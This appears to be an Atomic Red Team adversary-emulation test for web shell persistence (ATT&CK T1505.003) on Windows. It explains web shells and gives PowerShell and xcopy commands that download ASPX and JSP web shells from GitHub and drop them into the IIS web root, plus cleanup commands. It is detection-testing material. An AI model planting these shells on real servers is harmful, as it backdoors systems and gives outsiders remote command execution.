Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: China Chopper Web shell client).(Citation: Lee 2013)
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot |
| web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1505.003\src\ |
xcopy #{web_shells} #{web_shell_path}del #{web_shell_path} /q >nul 2>&1if (Test-Path #{web_shells}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"